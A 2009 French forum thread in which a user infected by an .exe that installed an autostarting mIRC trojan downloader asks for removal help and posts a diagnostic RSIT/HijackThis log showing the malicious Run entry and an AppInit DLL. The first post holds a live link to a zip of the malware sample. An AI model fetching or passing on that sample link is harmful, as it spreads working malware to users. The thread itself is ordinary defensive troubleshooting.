Virus downloader via mIRC

lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   -  
Lyonnais92 Messages postés 25708 Statut Contributeur sécurité -
Bonjour,

J'ai un soucis après avoir executé malencontreusement un .exe

Il m'a fait installé un client IRC qui se lance a chaque démarrage, téléchargeant ainsi automatiquement des trojans...

Depuis mon ordinateur est infecté, et j'ai besoin d'aide pour le désinfecter correctement.

Le virus est disponible via ce lien. J'imagine qu'en le décompilant vous comprendrez un peu mieux comment il fonctionne...

*NE PAS CLIQUER SI VOUS NE SAVEZ PAS DECOMPILER UN .EXE !*
http://lmlmike.free.fr/virus.zip
*NE PAS CLIQUER SI VOUS NE SAVEZ PAS DECOMPILER UN .EXE !*

Merci pour votre aide !
Configuration: Windows XP
Firefox 3.0.7

25 réponses

  • 1
  • 2
  1. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Bonjour,

    pour rendre un lien dangereux inoffensif, on le code hxxp au lieu de http.

    Mais ton signalement est déjà un bon réflexe.

    Merci de ta précaution.

    =====================
    Télécharge ici :

    http://images.malwareremoval.com/random/RSIT.exe

    random's system information tool (RSIT) par random/random et sauvegarde-le sur le Bureau.

    Double-clique sur RSIT.exe afin de lancer RSIT.

    Lis le contenu de l'écran Disclaimer puis clique sur Continue (si tu acceptes les conditions).

    Si l'outil HijackThis (version à jour) n'est pas présent ou non détecté sur l'ordinateur, RSIT le téléchargera (autorise l'accès dans ton pare-feu, si demandé) et tu devras accepter la licence.

    Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront.

    Poste le contenu de log.txt (<<qui sera affiché)
    .

    NB : Les rapports sont sauvegardés dans le dossier C:\rsit
    0
  2. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    Merci de t'occuper de mon cas et pour tes infos, je m'en rappelerai !

    Voici le rapport HiJackThis :

    Logfile of random's system information tool 1.05 (written by random/random)
    Run by lml-mike at 2009-03-17 12:41:55
    Microsoft Windows XP Professionnel Service Pack 3
    System drive C: has 3 GB (14%) free of 20 GB
    Total RAM: 3007 MB (74% free)
    
    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 12:42:10, on 17/03/2009
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16791)
    Boot mode: Normal
    
    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
    C:\Logs\Diskeeper\DkService.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
    V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
    C:\Program Files\Microsoft LifeCam\MSCamSvc.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\Program Files\Analog Devices\Core\smax4pnp.exe
    C:\Logs\Winamp\winampa.exe
    C:\Logs\DU Meter\DUMeter.exe
    C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    C:\WINDOWS\vVX6000.exe
    C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Windows Live\Messenger\msnmsgr.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe
    C:\Logs\Winamp Remote\bin\OrbTray.exe
    C:\Logs\SuperCopier2\SuperCopier2.exe
    C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Logs\Winamp Remote\bin\Orb.exe
    C:\WINDOWS\system32\wbem\wmiapsrv.exe
    C:\WINDOWS\System32\alg.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
    C:\Program Files\PC Connectivity Solution\Transports\NclUSBSrv.exe
    C:\Program Files\PC Connectivity Solution\Transports\NclRSSrv.exe
    C:\Program Files\Windows Live\Contacts\wlcomm.exe
    C:\WINDOWS\System32\svchost.exe
    C:\logs\avg\avgtray.exe
    C:\logs\avg\avgwdsvc.exe
    C:\logs\avg\avgam.exe
    C:\logs\avg\avgrsx.exe
    C:\Logs\mIRC\mirc.exe
    C:\Logs\Mozilla Firefox\firefox.exe
    C:\Documents and Settings\lml-mike\Bureau\RSIT.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe
    C:\Program Files\trend micro\lml-mike.exe
    
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www1.mini20.com/?tm=1&kw=Secure+Web+Search+Engine&KW1=Secure%20Web%20Search%20Engine&KW2=Best%20Malware%20Detection%20And%20Removal%20Software&searchbox=0&domainname=0&backfill=0
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
    O2 - BHO: G DATA WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
    O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O3 - Toolbar: (no name) - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
    O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [WinampAgent] C:\Logs\Winamp\winampa.exe
    O4 - HKLM\..\Run: [DU Meter] C:\Logs\DU Meter\DUMeter.exe
    O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Logs\Diskeeper\DkIcon.exe"
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
    O4 - HKLM\..\Run: [VX6000] C:\WINDOWS\vVX6000.exe
    O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Logs\QuickTime Alternative\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [AVG8_TRAY] C:\logs\avg\avgtray.exe
    O4 - HKLM\..\Run: [mirc] C:\WINDOWS\Winend\mirc.exe
    O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe"
    O4 - HKCU\..\Run: [Orb] "C:\Logs\Winamp Remote\bin\OrbTray.exe" /background
    O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Logs\SuperCopier2\SuperCopier2.exe
    O4 - HKCU\..\Run: [PC Suite Tray] "C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
    O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
    O17 - HKLM\System\CCS\Services\Tcpip\..\{8F84AFEF-B3CB-49E5-9B29-54622F44CD90}: NameServer = 192.168.1.1
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
    O20 - AppInit_DLLs: antbve.dll
    O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
    O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\logs\avg\avgwdsvc.exe
    O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Logs\Diskeeper\DkService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
    O23 - Service: RaySat_3dsmax8 Server (mi-raysat_3dsmax8) - Unknown owner - V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
    O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
    O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
    
    --
    End of file - 8948 bytes
    
    ======Scheduled tasks folder======
    
    C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    
    ======Registry dump======
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0124123D-61B4-456f-AF86-78C53A0790C5}]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
    SSVHelper Class - C:\Program Files\Java\jre6\bin\ssv.dll [2008-11-10 320920]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
    Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
    Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2008-11-10 34816]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
    JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2008-11-10 73728]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    {0124123D-61B4-456f-AF86-78C53A0790C5}
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    "SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe [2006-12-18 868352]
    "NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-10-07 13574144]
    "nwiz"=nwiz.exe /install []
    "WinampAgent"=C:\Logs\Winamp\winampa.exe [2008-04-01 36352]
    "DU Meter"=C:\Logs\DU Meter\DUMeter.exe [2003-06-22 1303552]
    "DiskeeperSystray"=C:\Logs\Diskeeper\DkIcon.exe [2004-10-04 176216]
    "NeroFilterCheck"=C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe [2006-01-12 155648]
    "LifeCam"=C:\Program Files\Microsoft LifeCam\LifeExp.exe [2006-06-30 269104]
    "VX6000"=C:\WINDOWS\vVX6000.exe [2006-06-30 994096]
    "HPDJ Taskbar Utility"=C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe [2003-03-09 188416]
    "NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-10-07 86016]
    "SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2008-11-10 136600]
    "QuickTime Task"=C:\Logs\QuickTime Alternative\QTTask.exe [2009-01-05 413696]
    "AVG8_TRAY"=C:\logs\avg\avgtray.exe [2009-03-17 1932568]
    "mirc"=C:\WINDOWS\Winend\mirc.exe [2006-11-23 2076672]
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
    "msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
    "BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"=C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe [2006-12-23 143360]
    "Orb"=C:\Logs\Winamp Remote\bin\OrbTray.exe [2008-04-01 507904]
    "SuperCopier2.exe"=C:\Logs\SuperCopier2\SuperCopier2.exe [2006-07-07 1052672]
    "PC Suite Tray"=C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe [2008-12-03 1205760]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
    "AppInit_DLLS"="antbve.dll"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\avgrsstarter]
    C:\WINDOWS\system32\avgrsstx.dll [2009-03-17 10520]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
    C:\WINDOWS\system32\WgaLogon.dll [2008-09-05 267304]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
    WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm.sys]
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "dontdisplaylastusername"=0
    "legalnoticecaption"=
    "legalnoticetext"=
    "shutdownwithoutlogon"=1
    "undockwithoutlogon"=1
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
    "NoDriveTypeAutoRun"=145
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
    "HonorAutoRunSetting"=
    
    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
    "C:\Documents and Settings\lml-mike\Bureau\temp\kav2k9\setup.exe"="C:\Documents and Settings\lml-mike\Bureau\temp\kav2k9\setup.exe:*:Enabled:Programme d'installation de Kaspersky Anti-Virus 2009"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe:*:Enabled:hl2"
    "C:\Logs\HLSW\hlsw.exe"="C:\Logs\HLSW\hlsw.exe:*:Enabled:HLSW Application"
    "C:\Logs\ABC\abc.exe"="C:\Logs\ABC\abc.exe:*:Enabled:abc"
    "V:\Steam\steam.exe"="V:\Steam\steam.exe:*:Enabled:Steam"
    "C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe"="C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe:*:Enabled:Nokia Service Layer Host Process "
    "C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe"="C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe:*:Enabled:Nokia Software Updater"
    "C:\WINDOWS\system32\mmc.exe"="C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console"
    "V:\eMule\emule.exe"="V:\eMule\emule.exe:*:Enabled:eMule"
    "C:\Program Files\Microsoft LifeCam\LifeCam.exe"="C:\Program Files\Microsoft LifeCam\LifeCam.exe:*:Enabled:LifeCam.exe"
    "C:\Program Files\Microsoft LifeCam\LifeExp.exe"="C:\Program Files\Microsoft LifeCam\LifeExp.exe:*:Enabled:LifeExp.exe"
    "C:\WINDOWS\system32\rundll32.exe"="C:\WINDOWS\system32\rundll32.exe:*:Enabled:Exécuter une DLL en tant qu'application"
    "V:\Quake III Arena\quake3.exe"="V:\Quake III Arena\quake3.exe:*:Enabled:quake3"
    "V:\Warcraft III\Warcraft III\Warcraft III.exe"="V:\Warcraft III\Warcraft III\Warcraft III.exe:*:Enabled:Warcraft III"
    "C:\Logs\Mozilla Firefox\firefox.exe"="C:\Logs\Mozilla Firefox\firefox.exe:*:Enabled:Firefox"
    "C:\Logs\FlashFXP\flashfxp.exe"="C:\Logs\FlashFXP\flashfxp.exe:*:Enabled:FlashFXP"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero\hl.exe:*:Enabled:Half-Life Launcher"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero deleted scenes\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero deleted scenes\hl.exe:*:Enabled:Half-Life Launcher"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\half-life\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life\hl.exe:*:Enabled:Half-Life Launcher"
    "C:\Logs\Mumble\mumble1.1.3\murmur.exe"="C:\Logs\Mumble\mumble1.1.3\murmur.exe:*:Enabled:murmur"
    "V:\cod4\iw3mp.exe"="V:\cod4\iw3mp.exe:*:Enabled:iw3mp"
    "V:\css\hl2.exe"="V:\css\hl2.exe:*:Enabled:hl2"
    "C:\Logs\Winamp Remote\bin\Orb.exe"="C:\Logs\Winamp Remote\bin\Orb.exe:*:Enabled:Orb"
    "C:\Logs\Winamp Remote\bin\OrbTray.exe"="C:\Logs\Winamp Remote\bin\OrbTray.exe:*:Enabled:OrbTray"
    "C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe"="C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe:*:Enabled:Orb Stream Client"
    "V:\Warcraft III\Warcraft III\Frozen Throne.exe"="V:\Warcraft III\Warcraft III\Frozen Throne.exe:*:Enabled:Frozen Throne.exe"
    "V:\Logs\backburner\monitor.exe"="V:\Logs\backburner\monitor.exe:*:Enabled:backburner 2.3 monitor"
    "V:\Logs\backburner\manager.exe"="V:\Logs\backburner\manager.exe:*:Enabled:backburner 2.3 manager"
    "V:\Logs\backburner\server.exe"="V:\Logs\backburner\server.exe:*:Enabled:backburner 2.3 server"
    "V:\Warcraft III\Warcraft III.exe"="V:\Warcraft III\Warcraft III.exe:*:Enabled:Warcraft III"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe:*:Enabled:hl2"
    "V:\Warcraft III\Frozen Throne.exe"="V:\Warcraft III\Frozen Throne.exe:*:Enabled:Warcraft III - The Frozen Throne"
    "C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe:*:Enabled:hl2"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe:*:Enabled:hl2"
    "C:\Logs\mIRC\mirc.exe"="C:\Logs\mIRC\mirc.exe:*:Enabled:mIRC"
    "V:\Steam\SteamApps\common\left 4 dead demo\srcds.exe"="V:\Steam\SteamApps\common\left 4 dead demo\srcds.exe:*:Enabled:srcds"
    "C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"
    "C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe"="C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe:*:Enabled:Kaspersky Internet Security 2009 Setup"
    "V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe:*:Enabled:Shaun White Snowboarding Game"
    "V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe:*:Enabled:Shaun White Snowboarding Update"
    "C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
    "C:\Logs\avg\avgam.exe"="C:\Logs\avg\avgam.exe:*:Enabled:avgam.exe"
    "C:\Logs\avg\avgupd.exe"="C:\Logs\avg\avgupd.exe:*:Enabled:avgupd.exe"
    "C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe"="C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe:*:Enabled:Octoshape add-in for Adobe Flash Player"
    "P:\Prince of Persia\Prince of Persia.exe"="P:\Prince of Persia\Prince of Persia.exe:*:Enabled:Prince of Persia Dx"
    "P:\Prince of Persia\PrinceOfPersia_Launcher.exe"="P:\Prince of Persia\PrinceOfPersia_Launcher.exe:*:Enabled:Prince of Persia Update"
    "C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
    "P:\Mirror's Edge\Binaries\MirrorsEdge.exe"="P:\Mirror's Edge\Binaries\MirrorsEdge.exe:*:Enabled:Mirror's Edge™"
    "C:\WINDOWS\Winend\mirc.exe"="C:\WINDOWS\Winend\mirc.exe:*:Disabled:mIRC"
    "V:\Steam\SteamApps\common\left 4 dead\left4dead.exe"="V:\Steam\SteamApps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead"
    
    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
    "C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
    
    ======File associations======
    
    .reg - open - "regedit.exe" "%1"
    
    ======List of files/folders created in the last 1 months======
    
    2009-03-17 12:41:56 ----D---- C:\Program Files\trend micro
    2009-03-17 12:41:55 ----D---- C:\rsit
    2009-03-17 03:01:50 ----HDC---- C:\WINDOWS\$NtUninstallKB960225$
    2009-03-17 03:01:43 ----HDC---- C:\WINDOWS\$NtUninstallKB958690$
    2009-03-17 03:01:18 ----HDC---- C:\WINDOWS\$NtUninstallKB959772_WM11$
    2009-03-09 13:11:53 ----D---- C:\WINDOWS\Winend
    2009-03-03 18:39:31 ----N---- C:\WINDOWS\IsUninst.Exe
    2009-03-03 18:38:36 ----A---- C:\WINDOWS\IsUn040c.exe
    2009-03-01 13:58:44 ----A---- C:\WINDOWS\system32\CmdLineExt03.dll
    2009-03-01 12:08:27 ----HD---- C:\$AVG8.VAULT$
    2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll.old
    2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll
    2009-02-28 16:11:21 ----D---- C:\Program Files\AVG
    2009-02-28 03:00:31 ----HDC---- C:\WINDOWS\$NtUninstallKB967715$
    2009-02-21 08:48:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\DeepBurner
    2009-02-20 16:12:39 ----A---- C:\WINDOWS\NAVIGMA.INI
    
    ======List of files/folders modified in the last 1 months======
    
    2009-03-17 12:41:58 ----D---- C:\WINDOWS\Prefetch
    2009-03-17 12:41:56 ----RD---- C:\Program Files
    2009-03-17 12:40:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\mIRC
    2009-03-17 08:35:56 ----D---- C:\WINDOWS\system32\drivers
    2009-03-17 08:35:43 ----D---- C:\WINDOWS\system32
    2009-03-17 03:59:21 ----D---- C:\WINDOWS\Temp
    2009-03-17 03:59:14 ----D---- C:\WINDOWS
    2009-03-17 03:58:00 ----A---- C:\WINDOWS\SchedLgU.Txt
    2009-03-17 03:01:53 ----HD---- C:\WINDOWS\inf
    2009-03-17 03:01:52 ----RSHDC---- C:\WINDOWS\system32\dllcache
